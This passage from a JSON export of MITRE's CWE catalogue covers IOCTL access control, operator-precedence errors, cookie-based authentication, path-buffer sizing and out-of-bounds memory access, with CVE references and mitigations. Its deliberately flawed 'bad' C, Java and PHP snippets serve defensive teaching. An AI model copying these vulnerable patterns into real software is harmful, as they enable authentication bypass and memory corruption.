ioctl calls to its direct rendering manager.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3831"},{"Reference":"CVE-2008-3525","Description":"ioctl does not check for a required capability before processing certain requests.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3525"},{"Reference":"CVE-2008-0322","Description":"Chain: insecure device permissions allows access to an IOCTL, allowing arbitrary memory to be overwritten.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0322"},{"Reference":"CVE-2007-4277","Description":"Chain: anti-virus product uses weak permissions for a device, leading to resultant buffer overflow in an exposed IOCTL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4277"},{"Reference":"CVE-2007-1400","Description":"Chain: sandbox allows opening of a TTY device, enabling shell commands through an exposed ioctl.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1400"},{"Reference":"CVE-2006-4926","Description":"Anti-virus product uses insecure security descriptor for a device driver, allowing access to a privileged IOCTL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4926"},{"Reference":"CVE-1999-0728","Description":"Unauthorized user can disable keyboard or mouse by directly invoking a privileged IOCTL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0728"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-701"}}},"Notes":{"Note":[{"#text":"This can be primary to many other weaknesses when the programmer assumes that the IOCTL can only be accessed by trusted parties. For example, a program or driver might not validate incoming addresses in METHOD_NEITHER IOCTLs in Windows environments (CWE-781), which could allow buffer overflow and similar attacks to take place, even when the attacker never should have been able to access the IOCTL at all.","attr":{"@_Type":"Relationship"}},{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"Because IOCTL functionality is typically performing low-level actions and closely interacts with the operating system, this weakness may only appear in code that is written in low-level languages."}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-07-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Observed_Examples"}]}},"783":{"attr":{"@_ID":"783","@_Name":"Operator Precedence Logic Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program uses an expression in which operator precedence causes incorrect logic to be used.","Extended_Description":"While often just a bug, operator precedence logic errors can have serious consequences if they are used in security-critical code, such as making an authentication decision.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"670","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Rarely"}},{"attr":{"@_Name":"C++","@_Prevalence":"Rarely"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Rarely"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"Logic errors related to operator precedence may cause problems even during normal operation, so they are probably discovered quickly during the testing phase. If testing is incomplete or there is a strong reliance on manual review of the code, then these errors may not be discovered before the software is deployed."}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Varies by Context","Unexpected State"],"Note":"The consequences will vary based on the context surrounding the incorrect precedence. In a security decision, integrity or confidentiality are the most likely results. Otherwise, a crash may occur due to the software reaching an unexpected state."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Regularly wrap sub-expressions in parentheses, especially in security-critical code."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following example, the method validateUser makes a call to another method to authenticate a username and password for a user and returns a success or failure code.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define FAIL 0#define SUCCESS 1...int validateUser(char *username, char *password) {}","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int isUser = FAIL;if (isUser = AuthenticateUser(username, password) == FAIL) {}else {}return isUser;","xhtml:br":["","","","","","","","",""],"xhtml:i":["// call method to authenticate username and password","// if authentication fails then return failure otherwise return success"],"xhtml:div":[{"#text":"return isUser;","attr":{"@_style":"margin-left:10px;"}},{"#text":"isUser = SUCCESS;","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...if ((isUser = AuthenticateUser(username, password)) == FAIL) {...","xhtml:br":["","","",""]}}],"Body_Text":"However, the method that authenticates the username and password is called within an if statement with incorrect operator precedence logic. Because the comparison operator \\"==\\" has a higher precedence than the assignment operator \\"=\\", the comparison operator will be evaluated first and if the method returns FAIL then the comparison will be true, the return variable will be set to true and SUCCESS will be returned. This operator precedence logic error can be easily resolved by properly using parentheses within the expression of the if statement, as shown below."},{"Intro_Text":"In this example, the method calculates the return on investment for an accounting/financial application. The return on investment is calculated by subtracting the initial investment costs from the current value and then dividing by the initial investment costs.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public double calculateReturnOnInvestment(double currentValue, double initialInvestment) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"double returnROI = 0.0;returnROI = currentValue - initialInvestment / initialInvestment;return returnROI;","xhtml:br":["","","","","",""],"xhtml:i":"// calculate return on investment"}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"...returnROI = (currentValue - initialInvestment) / initialInvestment;...","xhtml:br":["","","",""]}}],"Body_Text":["However, the return on investment calculation will not produce correct results because of the incorrect operator precedence logic in the equation. The divide operator has a higher precedence than the minus operator, therefore the equation will divide the initial investment costs by the initial investment costs which will only subtract one from the current value. Again this operator precedence logic error can be resolved by the correct use of parentheses within the equation, as shown below.","Note that the initialInvestment variable in this example should be validated to ensure that it is greater than zero to avoid a potential divide by zero error (CWE-369)."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-2516","Description":"Authentication module allows authentication bypass because it uses \\"(x = call(args) == SUCCESS)\\" instead of \\"((x = call(args)) == SUCCESS)\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2516"},{"Reference":"CVE-2008-0599","Description":"Chain: Language interpreter calculates wrong buffer size (CWE-131) by using \\"size = ptr ? X : Y\\" instead of \\"size = (ptr ? X : Y)\\" expression.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0599"},{"Reference":"CVE-2001-1155","Description":"Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1155"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP00-C","Entry_Name":"Use parentheses for precedence of operation","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP04-PL","Entry_Name":"Do not mix the early-precedence logical operators with late-precedence logical operators","Mapping_Fit":"CWE More Abstract"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-704"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Precedence&#34;, Page 287"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-07-16"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}]}},"784":{"attr":{"@_ID":"784","@_Name":"Reliance on Cookies without Validation and Integrity Checking in a Security Decision","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application uses a protection mechanism that relies on the existence or values of a cookie, but it does not properly ensure that the cookie is valid for the associated user.","Extended_Description":"Attackers can easily modify cookies, within the browser or by implementing the client-side code outside of the browser. Attackers can bypass protection mechanisms such as authorization and authentication by modifying the cookie to contain an expected value.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"807","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"565","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"It is dangerous to use cookies to set a user\'s privileges. The cookie can be manipulated to claim a high level of authorization, or to claim that successful authentication has occurred."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Avoid using cookie data for a security-related decision."},{"Phase":"Implementation","Description":"Perform thorough input validation (i.e.: server side validation) on the cookie data if you\'re going to use it for a security related decision."},{"Phase":"Architecture and Design","Description":"Add integrity checks to detect tampering."},{"Phase":"Architecture and Design","Description":"Protect critical cookies from replay attacks, since cross-site scripting or other attacks may allow attackers to steal a strongly-encrypted cookie that also passes integrity checks. This mitigation applies to cookies that should only be valid during a single transaction or session. By enforcing timeouts, you may limit the scope of an attack. As part of your integrity check, use an unpredictable, server-side value that is not exposed to the client."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-15"},"Intro_Text":"The following code excerpt reads a value from a browser cookie to determine the role of the user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Cookie[] cookies = request.getCookies();for (int i =0; i&lt; cookies.length; i++) {}","xhtml:br":"","xhtml:div":{"#text":"Cookie c = cookies[i];if (c.getName().equals(\\"role\\")) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"userRole = c.getValue();","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-16"},"Intro_Text":"The following code could be for a medical records application. It performs authentication by checking if a cookie has been set.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$auth = $_COOKIES[\'authenticated\'];if (! $auth) {}DisplayMedicalHistory($_POST[\'patient_ID\']);","xhtml:br":["",""],"xhtml:div":{"#text":"if (AuthenticateUser($_POST[\'user\'], $_POST[\'password\']) == \\"success\\") {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"// save the cookie to send out in future responsessetcookie(\\"authenticated\\", \\"1\\", time()+60*60*2);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"ShowLoginScreen();die(\\"\\\\n\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":""}}},"Body_Text":["The programmer expects that the AuthenticateUser() check will always be applied, and the \\"authenticated\\" cookie will only be set when authentication succeeds. The programmer even diligently specifies a 2-hour expiration for the cookie.","However, the attacker can set the \\"authenticated\\" cookie to a non-zero value such as 1. As a result, the $auth variable is 1, and the AuthenticateUser() check is not even performed. The attacker has bypassed the authentication."]},{"attr":{"@_Demonstrative_Example_ID":"DX-17"},"Intro_Text":"In the following example, an authentication flag is read from a browser cookie, thus allowing for external control of user state data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Cookie[] cookies = request.getCookies();for (int i =0; i&lt; cookies.length; i++) {}","xhtml:br":"","xhtml:div":{"#text":"Cookie c = cookies[i];if (c.getName().equals(\\"authenticated\\") &amp;&amp; Boolean.TRUE.equals(c.getValue())) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"authenticated = true;","attr":{"@_style":"margin-left:10px;"}}}}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-1549","Description":"Attacker can bypass authentication by setting a cookie to a specific value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1549"},{"Reference":"CVE-2009-1619","Description":"Attacker can bypass authentication and gain admin privileges by setting an \\"admin\\" cookie to 1.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1619"},{"Reference":"CVE-2009-0864","Description":"Content management system allows admin privileges by setting a \\"login\\" cookie to \\"OK.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0864"},{"Reference":"CVE-2008-5784","Description":"e-dating application allows admin privileges by setting the admin cookie to 1.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5784"},{"Reference":"CVE-2008-6291","Description":"Web-based email list manager allows attackers to gain admin privileges by setting a login cookie to \\"admin.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6291"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-706"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 13, &#34;Sensitive Data in Cookies and Fields&#34; Page 435"}}]},"Notes":{"Note":{"#text":"A new parent might need to be defined for this entry. This entry is specific to cookies, which reflects the significant number of vulnerabilities being reported for cookie-based authentication in CVE during 2008 and 2009. However, other types of inputs - such as parameters or headers - could also be used for similar authentication or authorization. Similar issues (under the Research view) include CWE-247 and CWE-472.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-07-16"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}]}},"785":{"attr":{"@_ID":"785","@_Name":"Use of Path Manipulation Function without Maximum-sized Buffer","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software invokes a function for normalizing paths or file names, but it provides an output buffer that is smaller than the maximum possible size, such as PATH_MAX.","Extended_Description":"Passing an inadequately-sized output buffer to a path manipulation function can result in a buffer overflow. Such functions include realpath(), readlink(), PathAppend(), and others.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"676","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"120","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Background_Details":{"Background_Detail":"Windows provides a large number of utility functions that manipulate buffers containing filenames. In most cases, the result is returned in a buffer that is passed in as input. (Usually the filename is modified in place.) Most functions require the buffer to be at least MAX_PATH bytes in length, but you should check the documentation for each function individually. If the buffer is not large enough to store the result of the manipulation, a buffer overflow can occur."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands","DoS: Crash, Exit, or Restart"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Always specify output buffers large enough to handle the maximum-size possible result from path manipulation functions."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example the function creates a directory named \\"output\\\\&lt;name&gt;\\" in the current directory and returns a heap-allocated copy of its name.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *createOutputDirectory(char *name) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char outputDirectoryName[128];if (getCurrentDirectory(128, outputDirectoryName) == 0) {}if (!PathAppend(outputDirectoryName, \\"output\\")) {}if (!PathAppend(outputDirectoryName, name)) {}if (SHCreateDirectoryEx(NULL, outputDirectoryName, NULL) != ERROR_SUCCESS) {}return StrDup(outputDirectoryName);","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"return null;","attr":{"@_style":"margin-left:10px;"}},{"#text":"return null;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return null;","xhtml:br":""}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return null;","xhtml:br":""}}]}}}},"Body_Text":"For most values of the current directory and the name parameter, this function will work properly. However, if the name parameter is particularly long, then the second call to PathAppend() could overflow the outputDirectoryName buffer, which is smaller than MAX_PATH bytes."}},"Affected_Resources":{"Affected_Resource":["Memory","File or Directory"]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Often Misused: File System"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP9","Entry_Name":"Faulty String Expansion"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"#text":"This entry is at a much lower level of abstraction than most entries because it is function-specific. It also has significant overlap with other entries that can vary depending on the perspective. For example, incorrect usage could trigger either a stack-based overflow (CWE-121) or a heap-based overflow (CWE-122). The CWE team has not decided how to handle such entries.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2009-07-27","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified before initial publication."},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Demonstrative_Examples, Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"786":{"attr":{"@_ID":"786","@_Name":"Access of Memory Location Before Start of Buffer","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software reads or writes to a buffer using an index or pointer that references a memory location prior to the beginning of the buffer.","Extended_Description":"This typically occurs when a pointer or its index is decremented to a position before the buffer, when pointer arithmetic results in a position before the beginning of the valid memory location, or when a negative index is used.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory","Note":"For an out-of-bounds read, the attacker may have access to sensitive information. If the sensitive information contains system details, such as the current buffers position in memory, this knowledge can be used to craft further attacks, possibly with more severe consequences."},{"Scope":["Integrity","Availability"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart"],"Note":"Out of bounds memory access will very likely result in the corruption of relevant memory, and perhaps instructions, possibly leading to a crash."},{"Scope":"Integrity","Impact":["Modify Memory","Execute Unauthorized Code or Commands"],"Note":"If the corrupted memory can be effectively controlled, it may be possible to execute arbitrary code. If the corrupted memory is data rather than instructions, the system will continue to function with improper changes, possibly in violation of an implicit or explicit policy."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-87"},"Intro_Text":"In the following C/C++ example, a utility function is used to trim trailing whitespace from a character string. The function copies the input string to a local character string and uses a while statement to remove the trailing whitespace by moving backward through the string and overwriting whitespace with a NUL character.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* trimTrailingWhitespace(char *strMessage, int length) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *retMessage;char *message = malloc(sizeof(char)*(length+1));char message[length+1];int index;for (index = 0; index &lt; length; index++) {}message[index] = \'\\\\0\';int len = index-1;while (isspace(message[len])) {}retMessage = message;return retMessage;","xhtml:br":["","","","","","","","","","","","","","",""],"xhtml:i":["// copy input string to a temporary string","// trim trailing whitespace","// return string without trailing whitespace"],"xhtml:div":[{"#text":"message[index] = strMessage[index];","attr":{"@_style":"margin-left:10px;"}},{"#text":"message[len] = \'\\\\0\';len--;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"However, this function can cause a buffer underwrite if the input character string contains all whitespace. On some systems the while statement will move backwards past the beginning of a character string and will call the isspace() function on an address outside of the bounds of the local buffer."},{"attr":{"@_Demonstrative_Example_ID":"DX-90"},"Intro_Text":"The following example asks a user for an offset into an array to select an item.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main (int argc, char **argv) {}","xhtml:br":"","xhtml:div":{"#text":"char *items[] = {\\"boat\\", \\"car\\", \\"truck\\", \\"train\\"};int index = GetUntrustedOffset();printf(\\"You selected %s\\\\n\\", items[index-1]);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The programmer allows the user to specify which element in the list to select, however an attacker can provide an out-of-bounds offset, resulting in a buffer over-read (CWE-126)."},{"attr":{"@_Demonstrative_Example_ID":"DX-88"},"Intro_Text":"The following is an example of code that may result in a buffer underwrite, if find() returns a negative value to indicate that ch is not found in srcBuf:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main() {}","xhtml:div":{"#text":"...strncpy(destBuf, &amp;srcBuf[find(srcBuf, ch)], 1024);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"If the index to srcBuf is somehow under user control, this is an arbitrary write-what-where condition."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-2227","Description":"Unchecked length of SSLv2 challenge value leads to buffer underflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2227"},{"Reference":"CVE-2007-4580","Description":"Buffer underflow from a small size value with a large buffer (length parameter inconsistency, CWE-130)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4580"},{"Reference":"CVE-2007-1584","Description":"Buffer underflow from an all-whitespace string, which causes a counter to be decremented before the buffer while looking for a non-whitespace character.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1584"},{"Reference":"CVE-2007-0886","Description":"Buffer underflow resultant from encoded data that triggers an integer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0886"},{"Reference":"CVE-2006-6171","Description":"Product sets an incorrect buffer size limit, leading to \\"off-by-two\\" buffer underflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6171"},{"Reference":"CVE-2006-4024","Description":"Negative value is used in a memcpy() operation, leading to buffer underflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4024"},{"Reference":"CVE-2004-2620","Description":"Buffer underflow due to mishandled special characters","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2620"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR30-C","Entry_Name":"Do not form or use out-of-bounds pointers or array subscripts","Mapping_Fit":"CWE More Specific"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-10-21"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"787":{"attr":{"@_ID":"787","@_Name":"Out-of-bounds Write","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software writes data past the end, or before the beginning, of the intended buffer.","Extended_Description":"Typically, this can result in corruption of data, a crash, or code execution.  The software may modify an index or perform pointer arithmetic that references a memory location that is outside of the boundaries of the buffer.  A subsequent write operation then produces undefined or unexpected results.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}},{"attr":{"@_Class":"Assembly","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Memory Corruption","Description":"The generic term \\"memory corruption\\" is often used to describe the consequences of writing to memory outside the bounds of a buffer, or to memory that is invalid, when the root cause is something other than a sequential copy of excessive data from a fixed starting location. This may include issues such as incorrect pointer arithmetic, accessing invalid pointers due to incomplete initialization or memory release, 